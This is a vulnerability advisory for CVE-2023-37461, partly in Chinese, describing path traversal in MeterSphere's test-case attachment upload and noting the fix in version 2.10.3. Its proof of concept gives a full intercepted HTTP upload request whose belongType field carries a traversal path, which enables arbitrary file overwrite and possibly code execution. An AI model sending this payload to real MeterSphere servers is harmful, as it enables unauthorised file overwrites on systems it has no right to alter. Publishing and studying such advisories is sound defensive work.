Headline
CVE-2023-37461: metersphere 存在路径穿越漏洞
Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a belongType value with a relative path like ../../../../ which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Summary
metersphere 由于只检查了文件名,忘记检查文件类型,导致路径穿越。
POC
POC: https://1drv.ms/v/s!Avwg5C1eKVA4gl3LF2hgRyVNrSqk?e=DHbHKF
1、找到测试用例中的上传附件的按钮
2、上传一个附件
3、拦截请求,
POST /track/attachment/testcase/upload HTTP/1.1
Host: 192.168.213.128:8081
Content-Length: 381
Accept-Language: zh-CN
WORKSPACE: ed18cee8-2004-4bf1-b112-0070bc03b270
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAv1vklOIsjcjAyZ7
Accept: application/json, text/plain, /
CSRF-TOKEN: PpGjvIYb9h+d3ui4XudsF0lKJ9oUMhPVBGIkOzibaLIfhzPrKVb0YQLLHByaPGP8pZeHZ1VwtciGzO528axH8g==
X-AUTH-TOKEN: a84e0cf1-05a7-4627-8129-0bc264dc694d
PROJECT: a815f3f2-57be-47f4-8351-56a5c643c0de
Origin: http://192.168.213.128:8081
Referer: http://192.168.213.128:8081/
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; privacy-options=6/12/2023|technical|statistical|external
Connection: close
------WebKitFormBoundaryAv1vklOIsjcjAyZ7
Content-Disposition: form-data; name="file"; filename="tmp2hyh.txt"
Content-Type: text/plain
tmp2
------WebKitFormBoundaryAv1vklOIsjcjAyZ7
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
{"belongId":"","belongType":"…/…/…/…/…/…/"}
------WebKitFormBoundaryAv1vklOIsjcjAyZ7–
4、我们发现修改belongType为…/…/…/…/…/…/就可以达到路径穿越的目的
5 我们看了一下代码,如下,uploadAttachment 检查了BelongType是否等于ISSUE以及TEST_CASE。如果都不是,就直接在函数saveAttachment中使用BelongType作为文件名的一部分,导致路径穿越。
Impact
任意文件覆盖,甚至可以达到任意代码执行